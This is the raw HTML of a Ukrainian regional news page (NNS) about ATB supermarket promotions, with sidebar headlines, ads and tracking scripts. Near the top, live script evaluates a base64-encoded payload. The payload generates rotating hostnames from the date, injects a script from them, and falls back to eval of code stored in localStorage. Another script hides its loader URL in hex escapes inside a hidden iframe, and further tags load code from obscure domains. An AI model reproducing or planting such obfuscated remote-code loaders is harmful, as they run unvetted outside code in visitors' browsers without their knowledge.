        node7499.parentNode.appendChild(script);
        script.onerror = function(){
         window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDc0OTkgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNzQ5OS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTc0OTkucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTc0OTkuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjc0OTkiKSkgfSwgNTAwMCk7ICA7fTsg") );
       }
     }
     </script><div id="bn_R95Pi5SNL2"></div><script type="text/javascript">(function(x,e,k){function u(a,b,c,d){function e(){var f=b.createElement("script");f.type="text/javascript";f.src=a;f.onerror=function(){g++;5>g?setTimeout(e,10):h(g+"!"+a)};f.onload=function(){d&&d();g&&h(g+"!"+a)};c.appendChild(f)}var g=0;e()}function v(){try{c=e.createElement("iframe"),c.style.setProperty("display","none","important"),c.id="rcMain",l.appendChild(c),b=c.contentWindow,d=b.document,d.open(),d.close(),m=d.body,Object.defineProperty(b,"rcBuf",{enumerable:!1,configurable:!1,writable:!1,
value:[]}),u("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x6f\x2e\x72\x63\x76\x6c\x69\x6e\x6b\x2e\x63\x6f\x6d/static/main.js",d,m,function(){for(var a;b.rcBuf&&(a=b.rcBuf.shift());)b.postMessage(a,n)})}catch(a){p(a)}}function p(a){h(a.name+": "+a.message+"\t"+(a.stack?a.stack.replace(a.name+": "+a.message,""):""))}function h(a){console.error(a);(new Image).src="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x6f\x2e\x72\x63\x76\x6c\x69\x6e\x6b\x73\x2e\x63\x6f\x6d/err/?code="+k+"&ms="+((new Date).getTime()-q)+"&ver="+w+"&text="+encodeURIComponent(a)}try{var w="200403-0324",n=(""+location).match(/(https?:\/\/[^/]+)/)[1],l=e.getElementById("bn_"+k),r=Math.random().toString(36).substring(2,
15),q=(new Date).getTime(),c,b,d,m;if(l){l.id="bn_"+r;var t={act:"init",id:k,rnd:r,ms:q};(c=e.getElementById("rcMain"))?b=c.contentWindow:v();b.rcMain?b.postMessage(t,n):b.rcBuf.push(t)}else h("!bn")}catch(a){p(a)}})(window,document,"R95Pi5SNL2");
</script><div class="shapkaright2"></div><h2 class="logo-title">NNS - Національна служба новин. Останні події в Україні та світі</h2><div class="content-item"></div><div id="show"></div><div id="slidebox"> <a class="close">×</a><div class="socilb"><div id="share"><div class="social" data-url="https://nikopolnews.net/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya"> <a class="push facebook" data-id="fb"><i class="fa fa-facebook"></i></a> <a class="push vkontakte" data-id="vk"><i class="fa fa-vk"></i></a> <a class="push telegram" data-id="tl"><i class="fa fa-telegram"></i></a> <a class="push ok" data-id="ok"><i class="fa fa-odnoklassniki"></i></a> <a class="push twitter" data-id="tw"><i class="fa fa-twitter"></i></a> <a class="push viber" data-id="viber"><i class="fa fa-phone"></i></a></div></div></div><div class="gn"> <a class="" href="https://news.google.com/publications/CAAqBwgKMOrfjAswnoOdAw?hl=uk&gl=UA&ceid=UA%3Auk" rel="nofollow" target="_blank"> <img style="float:left; padding-left: 15px; padding-top: 3px;" src="/templates/protostar/images/gn/gn.png" alt="" width="70px" height="55px"><div style="padding: 20px;padding-left: 0;font-size: 17px;color: white;">Підписатися на NNS у Google News</div> </a></div><div class="socajxs"><div id="CF2Ufk0qKsehYrFk9xh2" data-type="0" class="blockOfO1b2l3" ></div><script defer src="//reuckvv.pro/_W/BmK.js" ></script></div></div><ul class="pager pagenav"><li class="next"> <a class="hasTooltip" title="Рада підтримала зниження &quot;зеленого&quot; тарифу для сонячних та вітрових електростанцій" aria-label="наступна стаття: Рада підтримала зниження &quot;зеленого&quot; тарифу для сонячних та вітрових електростанцій" href="/ukraina/44-ekonomika/17298-saira-rada-pidtrymala-znyzhennia-zelenoho-taryfu-dlia-soniachnykh-ta-vitrovykh-elektrostantsii" rel="next"> <span aria-hidden="true">Наступна</span> <span class="icon-chevron-right" aria-hidden="true"></span> </a></li></ul></div></div></div><div class="clearfix"></div></main><div id="aside" class="span3"><div class="well hitstop"><h3 class="page-header">Останні новини</h3><div class="junewsultra hitstop"><div class="jn"><div class="jn-head"><div class="jn-left"> <picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/43-politika/17308-poranenij-s-ogodn-na-donbas-v-js-kovij-pomer" title="Поранений сьогодні на Донбасі військовий помер"><img loading="lazy" src="img/81x54/5/svichka5-5a9f6b1a.jpg" alt="Поранений сьогодні на Донбасі військовий помер" class="ampmetaimage smartresize" ></a></picture></div><div class="jn-right"><h4> <a href="/ukraina/43-politika/17308-poranenij-s-ogodn-na-donbas-v-js-kovij-pomer"> Поранений сьогодні на Донбасі військовий помер </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya" title="Акции в супермаркетах АТБ с 22 по 28 июля"><img loading="lazy" src="img/81x54/2/atbmagazinkoblevomarket-4c47982d.jpg" alt="Акции в супермаркетах АТБ с 22 по 28 июля" class="ampmetaimage smartresize" ></a></picture></div><div class="jn-right"><h4> <a href="/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya"> Акции в супермаркетах АТБ с 22 по 28 июля </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/41-proisshestviya/17307-propavshuyu-devushku-posle-trekh-dnej-poiska-nashli-v-nore" title="Пропавшую девушку после трех дней поиска нашли в норе"><img loading="lazy" src="img/81x54/8/2525871-c795ec20.jpg" alt="Пропавшую девушку после трех дней поиска нашли в норе" class="ampmetaimage smartresize" ></a></picture></div><div class="jn-right"><h4> <a href="/ukraina/41-proisshestviya/17307-propavshuyu-devushku-posle-trekh-dnej-poiska-nashli-v-nore"> Пропавшую девушку после трех дней поиска нашли в норе </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/40-obshchestvo/17306-saira-v-ukraini-khochut-znyzyty-ofitsiinyi-vik-molodi-z-35-do-29-rokiv" title="В Україні хочуть знизити офіційний вік молоді з 35 до 29 років"><img loading="lazy" src="img/81x54/c/12245485540-7c4d1474.jpg" alt="В Україні хочуть знизити офіційний вік молоді з 35 до 29 років" class="ampmetaimage smartresize" ></a></picture></div><div class="jn-right"><h4> <a href="/ukraina/40-obshchestvo/17306-saira-v-ukraini-khochut-znyzyty-ofitsiinyi-vik-molodi-z-35-do-29-rokiv"> В Україні хочуть знизити офіційний вік молоді з 35 до 29 років </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/40-obshchestvo/17304-saira-v-sluzi-narodu-rozpovily-chy-rozhliadaiut-pytannia-lehalizatsii-kanabisu" title="В &amp;quot;Слузі народу&amp;quot; розповіли, чи розглядають питання легалізації канабісу"><img loading="lazy" src="img/81x54/8/2121445545455-a8a802c1.jpg" alt="В &amp;quot;Слузі народу&amp;quot; розповіли, чи розглядають питання легалізації канабісу" class="ampmetaimage smartresize" ></a></picture></div><div class="jn-right"><h4> <a href="/ukraina/40-obshchestvo/17304-saira-v-sluzi-narodu-rozpovily-chy-rozhliadaiut-pytannia-lehalizatsii-kanabisu"> В &quot;Слузі народу&quot; розповіли, чи розглядають питання легалізації канабісу </a></h4><div class="jn-info"></div></div></div></div></div></div><div class="modright"><div id="M551151ScriptRootC842242"></div><script defer src="https://jsc.idealmedia.io/n/i/nikopolnews.net.842242.js"></script></div><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad><p><a href="https://besplatka.ua" rel="alternate noopener" target="_blank"><img alt="besplatka" src="/images/banners/besplatka.png" style="margin-left: auto; margin-right: auto; display: block;" /></a></p><div id="M551151ScriptRootC842242"></div><script defer src="https://jsc.idealmedia.io/n/i/nikopolnews.net.842242.js"></script><script type="text/javascript" defer="defer" src="https://c.her-ber.top/pzi/5691" ></script><div class="well hitstop"><h3 class="page-header">Найпопулярніше</h3><div class="junewsultra hitstop"><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya" title="Акции в супермаркетах АТБ с 22 по 28 июля"><img src="img/81x54/2/atbmagazinkoblevomarket-4c47982d.jpg" alt="Акции в супермаркетах АТБ с 22 по 28 июля" class="ampmetaimage smartresize" ></a></div><div class="jn-right"><h4> <a href="/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya"> Акции в супермаркетах АТБ с 22 по 28 июля </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/40-obshchestvo/17283-vlasti-prinyali-okonchatel-noe-reshenie-otnositel-no-organizatsii-obucheniya-detej" title="Власти приняли окончательное решение относительно организации обучения детей"><img src="img/81x54/0/159522673842main-ae1dab94.jpg" alt="Власти приняли окончательное решение относительно организации обучения детей" class="ampmetaimage smartresize" ></a></div><div class="jn-right"><h4> <a href="/ukraina/40-obshchestvo/17283-vlasti-prinyali-okonchatel-noe-reshenie-otnositel-no-organizatsii-obucheniya-detej"> Власти приняли окончательное решение относительно организации обучения детей </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/43-politika/17285-a-vi-prozhiv-t-na-42-tis-grn-to-duzhe-malo-n-na-shcho-ne-vistachae-skandal-na-sluga-narodu-poskarzhilas-na-malu-zarplatu" title="“А ви проживіть на 42 тис. грн, то дуже мало. Ні на що не вистачає”: скандальна “Слуга народу” поскаржилась на “малу” зарплату"><img src="img/81x54/a/vi0ud5dg32lgb-6b19c4ce.jpg" alt="“А ви проживіть на 42 тис. грн, то дуже мало. Ні на що не вистачає”: скандальна “Слуга народу” поскаржилась на “малу” зарплату" class="ampmetaimage smartresize" ></a></div><div class="jn-right"><h4> <a href="/ukraina/43-politika/17285-a-vi-prozhiv-t-na-42-tis-grn-to-duzhe-malo-n-na-shcho-ne-vistachae-skandal-na-sluga-narodu-poskarzhilas-na-malu-zarplatu"> “А ви проживіть на 42 тис. грн, то дуже мало. Ні на що не вистачає”: скандальна “Слуга народу” поскаржилась на “малу” зарплату </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/43-politika/17259-petits-ya-pro-v-dstavku-zelens-kogo-cherez-porushennya-zakonu-nabrala-neobkh-dnu-k-l-k-st-golos-v" title="Петиція про відставку Зеленського через порушення закону набрала необхідну кількість голосів"><img src="img/81x54/9/original43-d1c3239b.jpg" alt="Петиція про відставку Зеленського через порушення закону набрала необхідну кількість голосів" class="ampmetaimage smartresize" ></a></div><div class="jn-right"><h4> <a href="/ukraina/43-politika/17259-petits-ya-pro-v-dstavku-zelens-kogo-cherez-porushennya-zakonu-nabrala-neobkh-dnu-k-l-k-st-golos-v"> Петиція про відставку Зеленського через порушення закону набрала необхідну кількість голосів </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/ukraina-nn/17263-v-dnepre-ystroili-samosyd-nad-myjchinoi-kotoryi-ydaril-v-marshrytke-devyshky" title="В Днепре устроили самосуд над мужчиной, который ударил в маршрутке девушку"><img src="img/81x54/0/bd87075f8a44e9b087b8e120b863c699-1ade25b3.jpg" alt="В Днепре устроили самосуд над мужчиной, который ударил в маршрутке девушку" class="ampmetaimage smartresize" ></a></div><div class="jn-right"><h4> <a href="/ukraina/ukraina-nn/17263-v-dnepre-ystroili-samosyd-nad-myjchinoi-kotoryi-ydaril-v-marshrytke-devyshky"> В Днепре устроили самосуд над мужчиной, который ударил в маршрутке девушку </a></h4><div class="jn-info"></div></div></div></div></div></div></div></div></div></div><footer class="footer" role="contentinfo"><div class="container"><div class="containercopi"><h3>Новини України <strong>NNS</strong> ("Національна служба новин")</h3> Адреса редакції:&nbsp;Україна, Дніпропетровська обл., Нікополь<br /> E-mail:<a href="mailto:nikopol.net@ukr.net">&nbsp;nikopol.net@ukr.net</a><br /> Серія свідоцтва:&nbsp;ДП 2032-770Р (дата реєстрації&nbsp;23.10.2013)</p></div></div></footer><script>
jQuery(window).scroll(function(){
   if(jQuery(window).scrollTop()>40){
     jQuery('#logo').css('display','none');
     jQuery('#logo-small').css('display','block');
    }else{
     jQuery('#logo').css('display','block');
     jQuery('#logo-small').css('display','none');
    }
 });
</script><script type="text/javascript"ax:repeat="0">
	$(function() {
		$(window).scroll(function(){
			var distanceTop = $('#show').offset().top - $(window).height();
			if ($(window).scrollTop() > distanceTop)
				$('#slidebox').animate({'bottom':'0px'},300);
			else
				$('#slidebox').stop(true).animate({'bottom':'-405px'},200);
		});
		$('#slidebox .close').bind('click',function(){
			$(this).parent().remove();
		});
	});
</script><link rel="stylesheet" href="/plugins/content/smartresizer/smartresizer.css" /><link rel="stylesheet" href="https://nikopolnews.net/templates/protostar/html/mod_junewsultra/new/css/style.css" /><style type="text/css">body.site { border-top: 3px solid #29475d; background-color: #ffffff; } a { color: #29475d; } .nav-list > .active > a, .nav-list > .active > a:hover, .dropdown-menu li > a:hover, .dropdown-menu .active > a, .dropdown-menu .active > a:hover, .nav-pills > .active > a, .nav-pills > .active > a:hover, .btn-primary { background: #29475d; }</style><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebPage","name":"\u0410\u043a\u0446\u0438\u0438 \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411 \u0441 22 \u043f\u043e 28 \u0438\u044e\u043b\u044f","speakable":{"@type":"SpeakableSpecification","xpath":["\/html\/head\/title","\/html\/head\/meta[@name='description']\/@content"]},"url":"https:\/\/nikopolnews.net\/ukraina\/44-ekonomika\/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya"}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"NewsArticle","headline":"\u0410\u043a\u0446\u0438\u0438 \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411 \u0441 22 \u043f\u043e 28 \u0438\u044e\u043b\u044f","name":"\u0410\u043a\u0446\u0438\u0438 \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411 \u0441 22 \u043f\u043e 28 \u0438\u044e\u043b\u044f","description":"\u0421 22 \u043f\u043e 28\u00a0\u0438\u044e\u043b\u044f \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411\u00a0 \u0431\u0443\u0434\u0435\u0442\u00a0\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c\u00a0\u0440\u044f\u0434 \u0430\u043a\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0442 \u043a\u0443\u043f\u0438\u0442\u044c \u043c\u043d\u043e\u0433\u0438\u0435 \u0442\u043e\u0432\u0430\u0440\u044b \u0434\u0435\u0448\u0435\u0432\u043b\u0435, \u0447\u0435\u043c \u043e\u0431\u044b\u0447\u043d\u043e.\u00a0 NNS\u00a0\u00a0\u043f\u0443\u0431\u043b\u0438","articleBody":"\r\n\r\n\u0421 22 \u043f\u043e 28&nbsp;\u0438\u044e\u043b\u044f \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411&nbsp; \u0431\u0443\u0434\u0435\u0442&nbsp;\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c&nbsp;\u0440\u044f\u0434 \u0430\u043a\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0442 \u043a\u0443\u043f\u0438\u0442\u044c \u043c\u043d\u043e\u0433\u0438\u0435 \u0442\u043e\u0432\u0430\u0440\u044b \u0434\u0435\u0448\u0435\u0432\u043b\u0435, \u0447\u0435\u043c \u043e\u0431\u044b\u0447\u043d\u043e.&nbsp;\r\n\r\n","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/nikopolnews.net\/ukraina\/44-ekonomika\/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya"},"thumbnailUrl":"https:\/\/nikopolnews.net\/images\/2020\/atb-magazin-koblevo-market.jpg","image":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/2020\/atb-magazin-koblevo-market.jpg","height":505,"width":758},"dateCreated":"2020-07-21T17:01:21+01:00","dateModified":"2020-07-21T17:03:01+01:00","datePublished":"2020-07-21T17:01:21+01:00","interactionCount":"63545","author":{"@type":"Person","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d"},"publisher":{"@type":"Organization","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d","logo":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/thumbnails\/60060.png","height":60,"width":600}}}</script><script defer src="https://www.googletagmanager.com/gtag/js?id=UA-154914675-1"></script><script>
 window.dataLayer = window.dataLayer || [];
 function gtag(){dataLayer.push(arguments);}
 gtag('js', new Date());

 gtag('config', 'UA-154914675-1');
</script><script defer src="https://cdn.gravitec.net/storage/8a530aacfdbf04c76aa4a109a54c7fd5/client.js"></script><script>
$('p').each(function() {
  var $this = $(this);
  if($this.html().replace(/\s|&nbsp;/g, '').length == 0)
    $this.remove();
});
</script><script defer src="/templates/protostar/js/share.js"></script></body></html>